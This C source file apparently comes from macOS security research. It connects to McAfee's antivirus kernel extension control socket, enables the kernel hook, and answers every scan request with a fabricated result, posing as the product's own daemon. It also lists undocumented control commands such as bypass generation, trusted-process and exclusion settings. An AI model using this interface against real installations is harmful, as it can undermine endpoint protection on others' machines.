//
// main.c
// AVControl
//
// Created by User1 on 10/15/18.
// Copyright © 2018 Scott Knight. All rights reserved.
//
  8.  
#include <errno.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

#include <sys/ioctl.h>
#include <sys/kern_control.h>
#include <sys/socket.h>
#include <sys/sys_domain.h>
  18.  
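/*
 * Command codes passed as the optname of setsockopt() on the kernel-control
 * socket.  They were writable globals; an enum keeps them read-only,
 * debugger-visible and usable as case labels, while the values are unchanged.
 */
enum av_kext_command {
    ENABLE_KERNEL_HOOK       = 1,
    DISABLE_KERNEL_HOOK      = 2,
    PUT_SCAN_RESULT_MSG      = 4,
    PUT_SCAN_TIME_OUT        = 5,
    PING_KEXT                = 6,
    GENERATE_BYPASS          = 7,
    SCAN_RW_POLICY           = 8,
    ADD_TRUSTED_PROCESS      = 13,
    FLUSH_TRUSTED_PROCESS    = 14,
    INVALIDATE_BOOSTER_CACHE = 15,
    ENABLE_BOOSTER_CACHE     = 16,
    SET_LOG_LEVEL            = 17,
    CLEAR_DEVICE_ENTRIES     = 18,
    SET_KERNEL_EXCLUSIONS    = 19,
    CLEAR_KERNEL_EXCLUSIONS  = 20
};

/* Name of the kernel control registered by the kext; resolved to a ctl_id with CTLIOCGINFO. */
#define MYCONTROLNAME "com.McAfee.AVKext"

/* Control socket shared between main() and the ping thread; -1 until main() opens it. */
int fd = -1;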
  38.  
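/*
 * Keep-alive thread body: sends PING_KEXT on the shared control socket `fd`
 * every PING_INTERVAL_SEC seconds, forever.
 *
 * @param data  pthread start argument; not used.
 * @return never returns (the loop has no exit); void* only to satisfy pthread_create.
 */
void* ping(void* data)
{
    enum { PING_INTERVAL_SEC = 50 };
    (void)data;

    for (;;) {
        int result = setsockopt(fd, SYSPROTO_CONTROL, PING_KEXT, NULL, 0);
        if (result) {
            /* setsockopt() returns -1 and leaves the cause in errno; the bare
             * return value alone does not say why the ping failed. */
            fprintf(stderr, "setsockopt failed on PING_KEXT call - result was %d (%s)\n",
                    result, strerror(errno));
        }
        sleep(PING_INTERVAL_SEC);
    }
}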
  49.  
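/*
 * Dump `len` bytes starting at `mem` to stdout as lowercase hex, 16 bytes per
 * row, followed by a blank-line separator.
 *
 * @param mem  start of the region to dump; must be readable for `len` bytes.
 * @param len  number of bytes to print.
 */
void print_hex_memory_n(const void *mem, size_t len)
{
    const unsigned char *p = mem;
    for (size_t i = 0; i < len; i++) {
        printf("%02x", p[i]);
        /* Break the row once the 16th byte of the row has been printed, so
         * every row holds exactly 16 bytes. */
        if ((i + 1) % 16 == 0) {
            printf("\n");
        }
    }
    printf("\n\n\n\n");
}

/*
 * Dump the first 128 bytes at `mem` (see print_hex_memory_n).  Kept for
 * callers that pass no length; the caller must guarantee 128 readable bytes.
 *
 * @param mem  start of the region to dump.
 */
void print_hex_memory(void *mem)
{
    print_hex_memory_n(mem, 128);
}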
  60.  
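/* Sizes and offsets used on the kext's messages, as far as this client uses them. */
enum {
    SCAN_MSG_PATH_OFFSET = 48,      /* offset of the path string in a received scan message */
    SCAN_RESULT_MSG_LEN  = 1088,    /* length of the PUT_SCAN_RESULT_MSG payload */
    RECV_BUF_LEN         = 1080000  /* receive buffer size; kept as large as before */
};

/*
 * Open a kernel-control socket and connect it to the control named `name`.
 *
 * @param name  ctl_name registered by the kext (e.g. MYCONTROLNAME).
 * @return the connected socket, or -1 after reporting the failure on stderr.
 *         The socket is closed again on every failure path.
 */
static int connect_kernel_control(const char *name)
{
    int sock = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
    if (sock == -1) {
        perror("failed to open socket");
        return -1;
    }

    /* Resolve the control name to the id the kext registered under. */
    struct ctl_info info;
    memset(&info, 0, sizeof info);
    snprintf(info.ctl_name, sizeof info.ctl_name, "%s", name);
    if (ioctl(sock, CTLIOCGINFO, &info) != 0) {
        /* No trailing newline: perror() appends ": <strerror>\n" itself. */
        perror("Could not get ID for kernel control");
        close(sock);
        return -1;
    }

    struct sockaddr_ctl addr;
    memset(&addr, 0, sizeof addr);  /* also leaves sc_unit at 0 */
    addr.sc_len = sizeof addr;
    addr.sc_family = AF_SYSTEM;
    addr.ss_sysaddr = AF_SYS_CONTROL;
    addr.sc_id = info.ctl_id;
    addr.sc_unit = 0;

    if (connect(sock, (struct sockaddr *)&addr, sizeof addr) != 0) {
        perror("connect failed");
        close(sock);
        return -1;
    }
    return sock;
}

/*
 * Receive scan messages from the kext on `sock`, print the path each one
 * carries at SCAN_MSG_PATH_OFFSET, and answer every message with a
 * PUT_SCAN_RESULT_MSG.  Returns when recv() fails or reports end of stream.
 *
 * @param sock  connected kernel-control socket.
 */
static void receive_loop(int sock)
{
    /* ~1 MB; static keeps it off the stack. */
    static char buffer[RECV_BUF_LEN];

    /* Payload sent back for every message: all bytes 0xff, as before. */
    unsigned char file_scan_message[SCAN_RESULT_MSG_LEN];
    memset(file_scan_message, 0xff, sizeof file_scan_message);

    for (;;) {
        /* SOCK_DGRAM: one recv() yields one complete message, so each message
         * starts at buffer[0]; the bound is the whole buffer, not a running total. */
        ssize_t count = recv(sock, buffer, sizeof buffer, 0);
        if (count == -1) {
            perror("recv");
            break;
        }
        if (count == 0) {
            /* EOS on the socket. */
            break;
        }

        if (count > SCAN_MSG_PATH_OFFSET) {
            /* Limit the print to bytes actually received: a terminator within
             * the message is not guaranteed, so "%s" could read past it. */
            int path_len = (int)(count - SCAN_MSG_PATH_OFFSET);
            printf("%.*s\n", path_len, &buffer[SCAN_MSG_PATH_OFFSET]);
        } else {
            fprintf(stderr, "short message (%zd bytes), no path field\n", count);
        }
        /* print_hex_memory(buffer) dumps the raw message when debugging. */

        int result = setsockopt(sock, SYSPROTO_CONTROL, PUT_SCAN_RESULT_MSG,
                                file_scan_message, sizeof file_scan_message);
        if (result) {
            fprintf(stderr, "setsockopt failed on PUT_SCAN_RESULT_MSG call - result was %d (%s)\n",
                    result, strerror(errno));
        }
    }
}

/*
 * Entry point: connect to the kext's kernel control, start the keep-alive
 * thread, enable the kernel hook and then serve scan messages until the
 * socket fails or closes.
 *
 * @return EXIT_FAILURE if the control socket cannot be set up or the ping
 *         thread cannot be started, 0 otherwise.
 */
int main(int argc, const char * argv[]) {
    (void)argc;
    (void)argv;

    fd = connect_kernel_control(MYCONTROLNAME);
    if (fd == -1) {
        return EXIT_FAILURE;
    }

    /* Keep-alive thread; ping() works on the global fd and ignores its argument. */
    pthread_t ping_thread;
    int rc = pthread_create(&ping_thread, NULL, ping, NULL);
    if (rc != 0) {
        /* pthread_create() returns the error number directly, not via errno. */
        fprintf(stderr, "pthread_create failed: %s\n", strerror(rc));
        close(fd);
        return EXIT_FAILURE;
    }

    int result = setsockopt(fd, SYSPROTO_CONTROL, ENABLE_KERNEL_HOOK, NULL, 0);
    if (result) {
        /* Reported but not fatal, as before: the receive loop still runs. */
        fprintf(stderr, "setsockopt failed on ENABLE_KERNEL_HOOK call - result was %d (%s)\n",
                result, strerror(errno));
    }

    receive_loop(fd);

    return 0;
}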